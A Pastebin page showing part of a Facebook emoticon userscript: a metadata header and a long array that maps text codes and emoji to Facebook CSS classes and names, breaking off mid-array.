Advertisement
zenfunky

Add Smile

Feb 17th, 2014
124
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 57.58 KB | None | 0 0
  1. // ==UserScript==
  2. // @name Cài Đặt Icon Trực Tiếp Trên FaceBook 2014 (y)
  3. // @description All about facebook By Noname
  4. // @include https://*.facebook.com/*
  5. // @include https://*.facebook.com/*/*
  6. // @include http://*.facebook.com/*
  7. // @include http://*.facebook.com/*/*
  8. // ==/UserScript==
  9. // ==13470X==
  10. // ==============
  11. // ==Icon==
  12. (function() {
  13. // Active only in main frame
  14. if (!document.querySelector("#pageNav")) {
  15. return;
  16. }
  17. //console.info("Extra Facebook Smileys");
  18.  
  19. // = Data =======
  20. var emoticons = [ { // Text to picture emoticons
  21. "chars" : " :) ",
  22. "class" : "emoticon_smile",
  23. "name" : "Smiley"
  24. }, {
  25. "chars" : " :( ",
  26. "class" : "emoticon_frown",
  27. "name" : "Frown"
  28. }, {
  29. "chars" : " :P ",
  30. "class" : "emoticon_tongue",
  31. "name" : "Tongue"
  32. }, {
  33. "chars" : " :D ",
  34. "class" : "emoticon_grin",
  35. "name" : "Grin"
  36. }, {
  37. "chars" : " :o ",
  38. "class" : "emoticon_gasp",
  39. "name" : "Gasp"
  40. }, {
  41. "chars" : " ;) ",
  42. "class" : "emoticon_wink",
  43. "name" : "Wink"
  44. }, {
  45. "chars" : " :v ",
  46. "class" : "emoticon_pacman",
  47. "name" : "Pacman"
  48. }, {
  49. "chars" : " >:( ",
  50. "class" : "emoticon_grumpy",
  51. "name" : "Gru?ƒÂ±?ƒÂ³n"
  52. }, {
  53. "chars" : " :/ ",
  54. "class" : "emoticon_unsure",
  55. "name" : "Unsure"
  56. }, {
  57. "chars" : " :'( ",
  58. "class" : "emoticon_cry",
  59. "name" : "Cry"
  60. }, {
  61. "chars" : " ^_^ ",
  62. "class" : "emoticon_kiki",
  63. "name" : "Kiki"
  64. }, {
  65. "chars" : " 8) ",
  66. "class" : "emoticon_glasses",
  67. "name" : "Glasses"
  68. }, {
  69. "chars" : " B| ",
  70. "class" : "emoticon_sunglasses",
  71. "name" : "Sunglasses"
  72. }, {
  73. "chars" : " <3 ",
  74. "class" : "emoticon_heart",
  75. "name" : "Heart"
  76. }, {
  77. "chars" : " 3:) ",
  78. "class" : "emoticon_devil",
  79. "name" : "Devil"
  80. }, {
  81. "chars" : " O:) ",
  82. "class" : "emoticon_angel",
  83. "name" : "Angel"
  84. }, {
  85. "chars" : " -_- ",
  86. "class" : "emoticon_squint",
  87. "name" : "Squint"
  88. }, {
  89. "chars" : " o.O ",
  90. "class" : "emoticon_confused",
  91. "name" : "Confused"
  92. }, {
  93. "chars" : " >:o ",
  94. "class" : "emoticon_upset",
  95. "name" : "Upset"
  96. }, {
  97. "chars" : " :3 ",
  98. "class" : "emoticon_colonthree",
  99. "name" : "Colonthree"
  100. }, {
  101. "chars" : " (y) ",
  102. "class" : "emoticon_like",
  103. "name" : "Like"
  104. }, {
  105. "chars" : " :* ",
  106. "class" : "emoticon emoticon_kiss",
  107. "name" : "Kiss"
  108. }, {
  109. "chars" : " (^^^) ",
  110. "class" : "emoticon_shark",
  111. "name" : "Shark"
  112. }, {
  113. "chars" : " :|] ",
  114. "class" : "emoticon_robot",
  115. "name" : "Robot"
  116. }, {
  117. "chars" : " <(\") ",
  118. "class" : "emoticon_penguin",
  119. "name" : "Ping?ƒÂ¼ino"
  120. }, {
  121. "chars" : " :poop: ",
  122. "class" : "emoticon_poop",
  123. "name" : "Poop"
  124. }, {
  125. "chars" : " :putnam: ",
  126. "class" : "emoticon_putnam",
  127. "name" : "Putman"
  128. }, {
  129. "chars" : " \ud83c\udf02 ",
  130. "class" : "_1az _1a- _2c0",
  131. "name" : "Pink Umbrella"
  132. }, {
  133. "chars" : " \ud83c\udf0a ",
  134. "class" : "_1az _1a- _2c1",
  135. "name" : "Sea Wave"
  136. }, {
  137. "chars" : " \ud83c\udf19 ",
  138. "class" : "_1az _1a- _2c2",
  139. "name" : "Crescent moon"
  140. }, {
  141. "chars" : " \ud83c\udf1f ",
  142. "class" : "_1az _1a- _2c3",
  143. "name" : "Bright Star"
  144. }, {
  145. "chars" : " \ud83c\udf31 ",
  146. "class" : "_1az _1a- _2c4",
  147. "name" : "Seedbed"
  148. }, {
  149. "chars" : " \ud83c\udf34 ",
  150. "class" : "_1az _1a- _2c5",
  151. "name" : "Single Palm Tree"
  152. }, {
  153. "chars" : " \ud83c\udf35 ",
  154. "class" : "_1az _1a- _2c6",
  155. "name" : "Cactus"
  156. }, {
  157. "chars" : " \ud83c\udf37 ",
  158. "class" : "_1az _1a- _2c7",
  159. "name" : "Tulip"
  160. }, {
  161. "chars" : " \ud83c\udf38 ",
  162. "class" : "_1az _1a- _2c8",
  163. "name" : "Cherry Blossom"
  164. }, {
  165. "chars" : " \ud83c\udf39 ",
  166. "class" : "_1az _1a- _2c9",
  167. "name" : "Rose"
  168. }, {
  169. "chars" : " \ud83c\udf3a ",
  170. "class" : "_1az _1a- _2ca",
  171. "name" : "Cayenne"
  172. }, {
  173. "chars" : " \ud83c\udf3b ",
  174. "class" : "_1az _1a- _2cb",
  175. "name" : "Sunflower"
  176. }, {
  177. "chars" : " \ud83c\udf3e ",
  178. "class" : "_1az _1a- _2cc",
  179. "name" : "Ear Of Rice"
  180. }, {
  181. "chars" : " \ud83c\udf40 ",
  182. "class" : "_1az _1a- _2cd",
  183. "name" : "Four Leaf Clover"
  184. }, {
  185. "chars" : " \ud83c\udf41 ",
  186. "class" : "_1az _1a- _2ce",
  187. "name" : "Maple Leaf"
  188. }, {
  189. "chars" : " \ud83c\udf42 ",
  190. "class" : "_1az _1a- _2cf",
  191. "name" : "Fallen Leaf"
  192. }, {
  193. "chars" : " \ud83c\udf43 ",
  194. "class" : "_1az _1a- _2cg",
  195. "name" : "Leaf Floating In The Wind"
  196. }, {
  197. "chars" : " \ud83c\udf4a ",
  198. "class" : "_1az _1a- _2ch",
  199. "name" : "Tangerine"
  200. }, {
  201. "chars" : " \ud83c\udf4e ",
  202. "class" : "_1az _1a- _2ci",
  203. "name" : "Red Apple"
  204. }, {
  205. "chars" : " \ud83c\udf53 ",
  206. "class" : "_1az _1a- _2cj",
  207. "name" : "Strawberry"
  208. }, {
  209. "chars" : " \ud83c\udf54 ",
  210. "class" : "_1az _1a- _2ck",
  211. "name" : "Burger"
  212. }, {
  213. "chars" : " \ud83c\udf78 ",
  214. "class" : "_1az _1a- _2cl",
  215. "name" : "Cocktail Glass"
  216. }, {
  217. "chars" : " \ud83c\udf7a ",
  218. "class" : "_1az _1a- _2cm",
  219. "name" : "Tankard"
  220. }, {
  221. "chars" : " \ud83c\udf81 ",
  222. "class" : "_1az _1a- _2cn",
  223. "name" : "Gift Wrapped"
  224. }, {
  225. "chars" : " \ud83c\udf83 ",
  226. "class" : "_1az _1a- _2co",
  227. "name" : "Pumpkin With Candle"
  228. }, {
  229. "chars" : " \ud83c\udf84 ",
  230. "class" : "_1az _1a- _2cp",
  231. "name" : "Christmas Tree"
  232. }, {
  233. "chars" : " \ud83c\udf85 ",
  234. "class" : "_1az _1a- _2cq",
  235. "name" : "Santa"
  236. }, {
  237. "chars" : " \ud83c\udf88 ",
  238. "class" : "_1az _1a- _2cr",
  239. "name" : "Balloon"
  240. }, {
  241. "chars" : " \ud83c\udf89 ",
  242. "class" : "_1az _1a- _2cs",
  243. "name" : "Party Popper"
  244. }, {
  245. "chars" : " \ud83c\udf8d ",
  246. "class" : "_1az _1a- _2ct",
  247. "name" : "Pine Decor"
  248. }, {
  249. "chars" : " \ud83c\udf8e ",
  250. "class" : "_1az _1a- _2cu",
  251. "name" : "Japanese Dolls"
  252. }, {
  253. "chars" : " \ud83c\udf8f ",
  254. "class" : "_1az _1a- _2cv",
  255. "name" : "Carp Streamer"
  256. }, {
  257. "chars" : " \ud83c\udf90 ",
  258. "class" : "_1az _1a- _2cw",
  259. "name" : "Wind Chime"
  260. }, {
  261. "chars" : " \ud83c\udf93 ",
  262. "class" : "_1az _1a- _2cx",
  263. "name" : "Graduation Cap"
  264. }, {
  265. "chars" : " \ud83c\udfb5 ",
  266. "class" : "_1az _1a- _2cy",
  267. "name" : "Musical Note"
  268. }, {
  269. "chars" : " \ud83c\udfb6 ",
  270. "class" : "_1az _1a- _2cz",
  271. "name" : "Multiple Musical Notes"
  272. }, {
  273. "chars" : " \ud83c\udfbc ",
  274. "class" : "_1az _1a- _2c-",
  275. "name" : "Musical Score"
  276. }, {
  277. "chars" : " \ud83d\udc0d ",
  278. "class" : "_1az _1a- _2c_",
  279. "name" : "Snake"
  280. }, {
  281. "chars" : " \ud83d\udc0e ",
  282. "class" : "_1az _1a- _2d0",
  283. "name" : "Horse"
  284. }, {
  285. "chars" : " \ud83d\udc11 ",
  286. "class" : "_1az _1a- _2d1",
  287. "name" : "Sheep"
  288. }, {
  289. "chars" : " \ud83d\udc12 ",
  290. "class" : "_1az _1a- _2d2",
  291. "name" : "Monkey"
  292. }, {
  293. "chars" : " \ud83d\udc14 ",
  294. "class" : "_1az _1a- _2d3",
  295. "name" : "Hen"
  296. }, {
  297. "chars" : " \ud83d\udc17 ",
  298. "class" : "_1az _1a- _2d4",
  299. "name" : "Wild Boar"
  300. }, {
  301. "chars" : " \ud83d\udc18 ",
  302. "class" : "_1az _1a- _2d5",
  303. "name" : "Elephant"
  304. }, {
  305. "chars" : " \ud83d\udc19 ",
  306. "class" : "_1az _1a- _2d6",
  307. "name" : "Octopus"
  308. }, {
  309. "chars" : " \ud83d\udc1a ",
  310. "class" : "_1az _1a- _2d7",
  311. "name" : "Snail Shell"
  312. }, {
  313. "chars" : " \ud83d\udc1b ",
  314. "class" : "_1az _1a- _2d8",
  315. "name" : "Insect"
  316. }, {
  317. "chars" : " \ud83d\udc1f ",
  318. "class" : "_1az _1a- _2d9",
  319. "name" : "Fish"
  320. }, {
  321. "chars" : " \ud83d\udc20 ",
  322. "class" : "_1az _1a- _2da",
  323. "name" : "Tropical Fish"
  324. }, {
  325. "chars" : " \ud83d\udc21 ",
  326. "class" : "_1az _1a- _2db",
  327. "name" : "Pufferfish"
  328. }, {
  329. "chars" : " \ud83d\udc25 ",
  330. "class" : "_1az _1a- _2dc",
  331. "name" : "Chick In Front"
  332. }, {
  333. "chars" : " \ud83d\udc26 ",
  334. "class" : "_1az _1a- _2dd",
  335. "name" : "Bird"
  336. }, {
  337. "chars" : " \ud83d\udc27 ",
  338. "class" : "_1az _1a- _2de",
  339. "name" : "Penguin"
  340. }, {
  341. "chars" : " \ud83d\udc28 ",
  342. "class" : "_1az _1a- _2df",
  343. "name" : "Koala"
  344. }, {
  345. "chars" : " \ud83d\udc29 ",
  346. "class" : "_1az _1a- _2dg",
  347. "name" : "Poodle"
  348. }, {
  349. "chars" : " \ud83d\udc2b ",
  350. "class" : "_1az _1a- _2dh",
  351. "name" : "Bactrian Camel"
  352. }, {
  353. "chars" : " \ud83d\udc2c ",
  354. "class" : "_1az _1a- _2di",
  355. "name" : "Dolphin"
  356. }, {
  357. "chars" : " \ud83d\udc2d ",
  358. "class" : "_1az _1a- _2dj",
  359. "name" : "Mouse Face"
  360. }, {
  361. "chars" : " \ud83d\udc2e ",
  362. "class" : "_1az _1a- _2dk",
  363. "name" : "Cow Face"
  364. }, {
  365. "chars" : " \ud83d\udc2f ",
  366. "class" : "_1az _1a- _2dl",
  367. "name" : "Cara de tigre"
  368. }, {
  369. "chars" : " \ud83d\udc30 ",
  370. "class" : "_1az _1a- _2dm",
  371. "name" : "Rabbit Face"
  372. }, {
  373. "chars" : " \ud83d\udc31 ",
  374. "class" : "_1az _1a- _2dn",
  375. "name" : "Cat Face"
  376. }, {
  377. "chars" : " \ud83d\udc33 ",
  378. "class" : "_1az _1a- _2do",
  379. "name" : "Whale Sputtering"
  380. }, {
  381. "chars" : " \ud83d\udc34 ",
  382. "class" : "_1az _1a- _2dp",
  383. "name" : "Horse Face"
  384. }, {
  385. "chars" : " \ud83d\udc35 ",
  386. "class" : "_1az _1a- _2dq",
  387. "name" : "Monkey Face"
  388. }, {
  389. "chars" : " \ud83d\udc37 ",
  390. "class" : "_1az _1a- _2dr",
  391. "name" : "Pig face"
  392. }, {
  393. "chars" : " \ud83d\udc38 ",
  394. "class" : "_1az _1a- _2ds",
  395. "name" : "Frog Face"
  396. }, {
  397. "chars" : " \ud83d\udc39 ",
  398. "class" : "_1az _1a- _2dt",
  399. "name" : "Hamster Face"
  400. }, {
  401. "chars" : " \ud83d\udc3a ",
  402. "class" : "_1az _1a- _2du",
  403. "name" : "Wolf Face"
  404. }, {
  405. "chars" : " \ud83d\udc3b ",
  406. "class" : "_1az _1a- _2dv",
  407. "name" : "Bear Face"
  408. }, {
  409. "chars" : " \ud83d\udc3e ",
  410. "class" : "_1az _1a- _2dw",
  411. "name" : "Footprints"
  412. }, {
  413. "chars" : " \ud83d\udc40 ",
  414. "class" : "_1az _1a- _2dx",
  415. "name" : "Eyes"
  416. }, {
  417. "chars" : " \ud83d\udc42 ",
  418. "class" : "_1az _1a- _2dy",
  419. "name" : "Ear"
  420. }, {
  421. "chars" : " \ud83d\udc43 ",
  422. "class" : "_1az _1a- _2dz",
  423. "name" : "Nose"
  424. }, {
  425. "chars" : " \ud83d\udc44 ",
  426. "class" : "_1az _1a- _2d-",
  427. "name" : "Mouth"
  428. }, {
  429. "chars" : " \ud83d\udc45 ",
  430. "class" : "_1az _1a- _2d_",
  431. "name" : "Sour Face"
  432. }, {
  433. "chars" : " \ud83d\udc46 ",
  434. "class" : "_1az _1a- _2e0",
  435. "name" : "White hand pointing up"
  436. }, {
  437. "chars" : " \ud83d\udc47 ",
  438. "class" : "_1az _1a- _2e1",
  439. "name" : "White hand faces downward"
  440. }, {
  441. "chars" : " \ud83d\udc48 ",
  442. "class" : "_1az _1a- _2e2",
  443. "name" : "White hand indicating left"
  444. }, {
  445. "chars" : " \ud83d\udc49 ",
  446. "class" : "_1az _1a- _2e3",
  447. "name" : "White hand indicating right"
  448. }, {
  449. "chars" : " \ud83d\udc4a ",
  450. "class" : "_1az _1a- _2e4",
  451. "name" : "Fist"
  452. }, {
  453. "chars" : " \ud83d\udc4b ",
  454. "class" : "_1az _1a- _2e5",
  455. "name" : "Hand in motion"
  456. }, {
  457. "chars" : " \ud83d\udc4c ",
  458. "class" : "_1az _1a- _2e6",
  459. "name" : "Hand showing all good"
  460. }, {
  461. "chars" : " \ud83d\udc4d ",
  462. "class" : "_1az _1a- _2e7",
  463. "name" : "Hand with thumb up"
  464. }, {
  465. "chars" : " \ud83d\udc4e ",
  466. "class" : "_1az _1a- _2e8",
  467. "name" : "Hand with thumb down"
  468. }, {
  469. "chars" : " \ud83d\udc4f ",
  470. "class" : "_1az _1a- _2e9",
  471. "name" : "Hands clapping"
  472. }, {
  473. "chars" : " \ud83d\udc50 ",
  474. "class" : "_1az _1a- _2ea",
  475. "name" : "Open Hands"
  476. }, {
  477. "chars" : " \ud83d\udc66 ",
  478. "class" : "_1az _1a- _2eb",
  479. "name" : "Boy"
  480. }, {
  481. "chars" : " \ud83d\udc67 ",
  482. "class" : "_1az _1a- _2ec",
  483. "name" : "Girl"
  484. }, {
  485. "chars" : " \ud83d\udc68 ",
  486. "class" : "_1az _1a- _2ed",
  487. "name" : "Man"
  488. }, {
  489. "chars" : " \ud83d\udc69 ",
  490. "class" : "_1az _1a- _2ee",
  491. "name" : "Woman"
  492. }, {
  493. "chars" : " \ud83d\udc6b ",
  494. "class" : "_1az _1a- _2ef",
  495. "name" : "Man and woman holding hands"
  496. }, {
  497. "chars" : " \ud83d\udc6e ",
  498. "class" : "_1az _1a- _2eg",
  499. "name" : "Police Officer"
  500. }, {
  501. "chars" : " \ud83d\udc6f ",
  502. "class" : "_1az _1a- _2eh",
  503. "name" : "Woman with bunny ears"
  504. }, {
  505. "chars" : " \ud83d\udc71 ",
  506. "class" : "_1az _1a- _2ei",
  507. "name" : "Person with hair rubio"
  508. }, {
  509. "chars" : " \ud83d\udc72 ",
  510. "class" : "_1az _1a- _2ej",
  511. "name" : "Man with pi mao gua"
  512. }, {
  513. "chars" : " \ud83d\udc73 ",
  514. "class" : "_1az _1a- _2ek",
  515. "name" : "Man with turban"
  516. }, {
  517. "chars" : " \ud83d\udc74 ",
  518. "class" : "_1az _1a- _2el",
  519. "name" : "Old Man"
  520. }, {
  521. "chars" : " \ud83d\udc75 ",
  522. "class" : "_1az _1a- _2em",
  523. "name" : "Old Woman"
  524. }, {
  525. "chars" : " \ud83d\udc76 ",
  526. "class" : "_1az _1a- _2en",
  527. "name" : "Baby"
  528. }, {
  529. "chars" : " \ud83d\udc77 ",
  530. "class" : "_1az _1a- _2eo",
  531. "name" : "Construction Worker"
  532. }, {
  533. "chars" : " \ud83d\udc78 ",
  534. "class" : "_1az _1a- _2ep",
  535. "name" : "Princess"
  536. }, {
  537. "chars" : " \ud83d\udc7b ",
  538. "class" : "_1az _1a- _2eq",
  539. "name" : "Ghost"
  540. }, {
  541. "chars" : " \ud83d\udc7c ",
  542. "class" : "_1az _1a- _2er",
  543. "name" : "Angel baby"
  544. }, {
  545. "chars" : " \ud83d\udc7d ",
  546. "class" : "_1az _1a- _2es",
  547. "name" : "Alien"
  548. }, {
  549. "chars" : " \ud83d\udc7e ",
  550. "class" : "_1az _1a- _2et",
  551. "name" : "Alien Monster"
  552. }, {
  553. "chars" : " \ud83d\udc7f ",
  554. "class" : "_1az _1a- _2eu",
  555. "name" : "Imp"
  556. }, {
  557. "chars" : " \ud83d\udc80 ",
  558. "class" : "_1az _1a- _2ev",
  559. "name" : "Skull"
  560. }, {
  561. "chars" : " \ud83d\udc82 ",
  562. "class" : "_1az _1a- _2ew",
  563. "name" : "Guard"
  564. }, {
  565. "chars" : " \ud83d\udc83 ",
  566. "class" : "_1az _1a- _2ex",
  567. "name" : "Ballerina"
  568. }, {
  569. "chars" : " \ud83d\udc85 ",
  570. "class" : "_1az _1a- _2ey",
  571. "name" : "Nail Polish"
  572. }, {
  573. "chars" : " \ud83d\udc8b ",
  574. "class" : "_1az _1a- _2ez",
  575. "name" : "Brand of kiss"
  576. }, {
  577. "chars" : " \ud83d\udc8f ",
  578. "class" : "_1az _1a- _2e-",
  579. "name" : "Kissing couple"
  580. }, {
  581. "chars" : " \ud83d\udc90 ",
  582. "class" : "_1az _1a- _2e_",
  583. "name" : "Bunch of flowers"
  584. }, {
  585. "chars" : " \ud83d\udc91 ",
  586. "class" : "_1az _1a- _2f0",
  587. "name" : "Couple with heart"
  588. }, {
  589. "chars" : " \ud83d\udc93 ",
  590. "class" : "_1az _1a- _2f1",
  591. "name" : "Heart beating"
  592. }, {
  593. "chars" : " \ud83d\udc94 ",
  594. "class" : "_1az _1a- _2f2",
  595. "name" : "Broken Heart"
  596. }, {
  597. "chars" : " \ud83d\udc96 ",
  598. "class" : "_1az _1a- _2f3",
  599. "name" : "Bright Heart"
  600. }, {
  601. "chars" : " \ud83d\udc97 ",
  602. "class" : "_1az _1a- _2f4",
  603. "name" : "Heart growing"
  604. }, {
  605. "chars" : " \ud83d\udc98 ",
  606. "class" : "_1az _1a- _2f5",
  607. "name" : "Heart with arrow"
  608. }, {
  609. "chars" : " \ud83d\udc99 ",
  610. "class" : "_1az _1a- _2f6",
  611. "name" : "Blue Heart"
  612. }, {
  613. "chars" : " \ud83d\udc9a ",
  614. "class" : "_1az _1a- _2f7",
  615. "name" : "Green Heart"
  616. }, {
  617. "chars" : " \ud83d\udc9b ",
  618. "class" : "_1az _1a- _2f8",
  619. "name" : "Yellow Heart"
  620. }, {
  621. "chars" : " \ud83d\udc9c ",
  622. "class" : "_1az _1a- _2f9",
  623. "name" : "Purple Heart"
  624. }, {
  625. "chars" : " \ud83d\udc9d ",
  626. "class" : "_1az _1a- _2fa",
  627. "name" : "Heart with ribbon"
  628. }, {
  629. "chars" : " \ud83d\udca2 ",
  630. "class" : "_1az _1a- _2fb",
  631. "name" : "Symbol of anger"
  632. }, {
  633. "chars" : " \ud83d\udca4 ",
  634. "class" : "_1az _1a- _2fc",
  635. "name" : "Sleeping"
  636. }, {
  637. "chars" : " \ud83d\udca6 ",
  638. "class" : "_1az _1a- _2fd",
  639. "name" : "Sweat Symbol"
  640. }, {
  641. "chars" : " \ud83d\udca8 ",
  642. "class" : "_1az _1a- _2fe",
  643. "name" : "Quick Start Symbol"
  644. }, {
  645. "chars" : " \ud83d\udca9 ",
  646. "class" : "_1az _1a- _2ff",
  647. "name" : "Pile of Caca"
  648. }, {
  649. "chars" : " \ud83d\udcaa ",
  650. "class" : "_1az _1a- _2fg",
  651. "name" : "Flexed bicep"
  652. }, {
  653. "chars" : " \ud83d\udcbb ",
  654. "class" : "_1az _1a- _2fh",
  655. "name" : "Personal Computer"
  656. }, {
  657. "chars" : " \ud83d\udcbd ",
  658. "class" : "_1az _1a- _2fi",
  659. "name" : "Mini Disco"
  660. }, {
  661. "chars" : " \ud83d\udcbe ",
  662. "class" : "_1az _1a- _2fj",
  663. "name" : "Floppy disk"
  664. }, {
  665. "chars" : " \ud83d\udcbf ",
  666. "class" : "_1az _1a- _2fk",
  667. "name" : "Optical Disc"
  668. }, {
  669. "chars" : " \ud83d\udcc0 ",
  670. "class" : "_1az _1a- _2fl",
  671. "name" : "DVD"
  672. }, {
  673. "chars" : " \ud83d\udcde ",
  674. "class" : "_1az _1a- _2fm",
  675. "name" : "Telephone receiver"
  676. }, {
  677. "chars" : " \ud83d\udce0 ",
  678. "class" : "_1az _1a- _2fn",
  679. "name" : "Fax"
  680. }, {
  681. "chars" : " \ud83d\udcf1 ",
  682. "class" : "_1az _1a- _2fo",
  683. "name" : "Mobile Phone"
  684. }, {
  685. "chars" : " \ud83d\udcf2 ",
  686. "class" : "_1az _1a- _2fp",
  687. "name" : "Mobile phone with arrow from left to right"
  688. }, {
  689. "chars" : " \ud83d\udcfa ",
  690. "class" : "_1az _1a- _2fq",
  691. "name" : "Television"
  692. }, {
  693. "chars" : " \ud83d\udd14 ",
  694. "class" : "_1az _1a- _2fr",
  695. "name" : "Bell"
  696. }, {
  697. "chars" : " \ud83d\ude01 ",
  698. "class" : "_1az _1a- _2fs",
  699. "name" : "Face to face with smiling eyes"
  700. }, {
  701. "chars" : " \ud83d\ude02 ",
  702. "class" : "_1az _1a- _2ft",
  703. "name" : "Face with tears of joy"
  704. }, {
  705. "chars" : " \ud83d\ude03 ",
  706. "class" : "_1az _1a- _2fu",
  707. "name" : "Smiley face with open mouth"
  708. }, {
  709. "chars" : " \ud83d\ude04 ",
  710. "class" : "_1az _1a- _2fv",
  711. "name" : "Face and eyes smiling with mouth open"
  712. }, {
  713. "chars" : " \ud83d\ude06 ",
  714. "class" : "_1az _1a- _2fw",
  715. "name" : "Smiley face with mouth open and eyes closed"
  716. }, {
  717. "chars" : " \ud83d\ude09 ",
  718. "class" : "_1az _1a- _2fx",
  719. "name" : "Face winking eye"
  720. }, {
  721. "chars" : " \ud83d\ude0b ",
  722. "class" : "_1az _1a- _2fy",
  723. "name" : "Guy savoring delicious food"
  724. }, {
  725. "chars" : " \ud83d\ude0c ",
  726. "class" : "_1az _1a- _2fz",
  727. "name" : "Relief face"
  728. }, {
  729. "chars" : " \ud83d\ude0d ",
  730. "class" : "_1az _1a- _2f-",
  731. "name" : "Smiley face with heart shaped eyes"
  732. }, {
  733. "chars" : " \ud83d\ude0f ",
  734. "class" : "_1az _1a- _2f_",
  735. "name" : "Smirk face"
  736. }, {
  737. "chars" : " \ud83d\ude12 ",
  738. "class" : "_1az _1a- _2g0",
  739. "name" : "Face of boredom"
  740. }, {
  741. "chars" : " \ud83d\ude13 ",
  742. "class" : "_1az _1a- _2g1",
  743. "name" : "Face with cold sweat"
  744. }, {
  745. "chars" : " \ud83d\ude14 ",
  746. "class" : "_1az _1a- _2g2",
  747. "name" : "Pensive face"
  748. }, {
  749. "chars" : " \ud83d\ude16 ",
  750. "class" : "_1az _1a- _2g3",
  751. "name" : "Confused face"
  752. }, {
  753. "chars" : " \ud83d\ude18 ",
  754. "class" : "_1az _1a- _2g4",
  755. "name" : "Throwing kiss Face"
  756. }, {
  757. "chars" : " \ud83d\ude1a ",
  758. "class" : "_1az _1a- _2g5",
  759. "name" : "Kissing face with eyes closed"
  760. }, {
  761. "chars" : " \ud83d\ude1c ",
  762. "class" : "_1az _1a- _2g6",
  763. "name" : "Face with tongue out and winking"
  764. }, {
  765. "chars" : " \ud83d\ude1d ",
  766. "class" : "_1az _1a- _2g7",
  767. "name" : "Face with tongue hanging out and eyes closed"
  768. }, {
  769. "chars" : " \ud83d\ude1e ",
  770. "class" : "_1az _1a- _2g8",
  771. "name" : "Face discouraged"
  772. }, {
  773. "chars" : " \ud83d\ude20 ",
  774. "class" : "_1az _1a- _2g9",
  775. "name" : "Face of anger"
  776. }, {
  777. "chars" : " \ud83d\ude21 ",
  778. "class" : "_1az _1a- _2ga",
  779. "name" : "Very angry face"
  780. }, {
  781. "chars" : " \ud83d\ude22 ",
  782. "class" : "_1az _1a- _2gb",
  783. "name" : "Crying Face"
  784. }, {
  785. "chars" : " \ud83d\ude23 ",
  786. "class" : "_1az _1a- _2gc",
  787. "name" : "Face of perseverance"
  788. }, {
  789. "chars" : " \ud83d\ude24 ",
  790. "class" : "_1az _1a- _2gd",
  791. "name" : "Face of triumph"
  792. }, {
  793. "chars" : " \ud83d\ude25 ",
  794. "class" : "_1az _1a- _2ge",
  795. "name" : "Face discouraged but relieved"
  796. }, {
  797. "chars" : " \ud83d\ude28 ",
  798. "class" : "_1az _1a- _2gf",
  799. "name" : "Scary face"
  800. }, {
  801. "chars" : " \ud83d\ude29 ",
  802. "class" : "_1az _1a- _2gg",
  803. "name" : "Fatigued face"
  804. }, {
  805. "chars" : " \ud83d\ude2a ",
  806. "class" : "_1az _1a- _2gh",
  807. "name" : "Sleeping face"
  808. }, {
  809. "chars" : " \ud83d\ude2b ",
  810. "class" : "_1az _1a- _2gi",
  811. "name" : "Tired face"
  812. }, {
  813. "chars" : " \ud83d\ude2d ",
  814. "class" : "_1az _1a- _2gj",
  815. "name" : "Face screaming"
  816. }, {
  817. "chars" : " \ud83d\ude30 ",
  818. "class" : "_1az _1a- _2gk",
  819. "name" : "Face with mouth open and cold sweat"
  820. }, {
  821. "chars" : " \ud83d\ude31 ",
  822. "class" : "_1az _1a- _2gl",
  823. "name" : "Terrified face of fear"
  824. }, {
  825. "chars" : " \ud83d\ude32 ",
  826. "class" : "_1az _1a- _2gm",
  827. "name" : "Very surprised face"
  828. }, {
  829. "chars" : " \ud83d\ude33 ",
  830. "class" : "_1az _1a- _2gn",
  831. "name" : "Face flushed"
  832. }, {
  833. "chars" : " \ud83d\ude35 ",
  834. "class" : "_1az _1a- _2go",
  835. "name" : "Face dizzy"
  836. }, {
  837. "chars" : " \ud83d\ude37 ",
  838. "class" : "_1az _1a- _2gp",
  839. "name" : "Face with medical mask"
  840. }, {
  841. "chars" : " \ud83d\ude38 ",
  842. "class" : "_1az _1a- _2gq",
  843. "name" : "Grinning Cat face and eyes closed"
  844. }, {
  845. "chars" : " \ud83d\ude39 ",
  846. "class" : "_1az _1a- _2gr",
  847. "name" : "Cat face with tears of laughter"
  848. }, {
  849. "chars" : " \ud83d\ude3a ",
  850. "class" : "_1az _1a- _2gs",
  851. "name" : "Smiling cat face with open mouth"
  852. }, {
  853. "chars" : " \ud83d\ude3b ",
  854. "class" : "_1az _1a- _2gt",
  855. "name" : "Smiling cat face with hearts in her eyes"
  856. }, {
  857. "chars" : " \ud83d\ude3c ",
  858. "class" : "_1az _1a- _2gu",
  859. "name" : "Face of cat smile twisted"
  860. }, {
  861. "chars" : " \ud83d\ude3d ",
  862. "class" : "_1az _1a- _2gv",
  863. "name" : "Cat face kissing with eyes closed"
  864. }, {
  865. "chars" : " \ud83d\ude3f ",
  866. "class" : "_1az _1a- _2gw",
  867. "name" : "Cat face crying"
  868. }, {
  869. "chars" : " \ud83d\ude40 ",
  870. "class" : "_1az _1a- _2gx",
  871. "name" : "Cat face scared terrified"
  872. }, {
  873. "chars" : " \ud83d\ude4b ",
  874. "class" : "_1az _1a- _2gy",
  875. "name" : "Happy person raising a hand"
  876. }, {
  877. "chars" : " \ud83d\ude4c ",
  878. "class" : "_1az _1a- _2gz",
  879. "name" : "Person holding up both hands in celebration"
  880. }, {
  881. "chars" : " \ud83d\ude4d ",
  882. "class" : "_1az _1a- _2g-",
  883. "name" : "Person frowning"
  884. }, {
  885. "chars" : " \ud83d\ude4f ",
  886. "class" : "_1az _1a- _2g_",
  887. "name" : "Person in prayer"
  888. }, {
  889. "chars" : " \u261d ",
  890. "class" : "_1az _1a- _2h0",
  891. "name" : "Index finger pointing up"
  892. }, {
  893. "chars" : " \u263a ",
  894. "class" : "_1az _1a- _2h1",
  895. "name" : "White face smiling"
  896. }, {
  897. "chars" : " \u26a1 ",
  898. "class" : "_1az _1a- _2h2",
  899. "name" : "High voltage symbol"
  900. }, {
  901. "chars" : " \u26c4 ",
  902. "class" : "_1az _1a- _2h3",
  903. "name" : "Snowless snowman"
  904. }, {
  905. "chars" : " \u270a ",
  906. "class" : "_1az _1a- _2h4",
  907. "name" : "Fist up"
  908. }, {
  909. "chars" : " \u270b ",
  910. "class" : "_1az _1a- _2h5",
  911. "name" : "Hand pointing up"
  912. }, {
  913. "chars" : " \u270c ",
  914. "class" : "_1az _1a- _2h6",
  915. "name" : "Winning Hand"
  916. }, {
  917. "chars" : " \u2600 ",
  918. "class" : "_1az _1a- _2h7",
  919. "name" : "Sun With Rays"
  920. }, {
  921. "chars" : " \u2601 ",
  922. "class" : "_1az _1a- _2h8",
  923. "name" : "Cloud"
  924. }, {
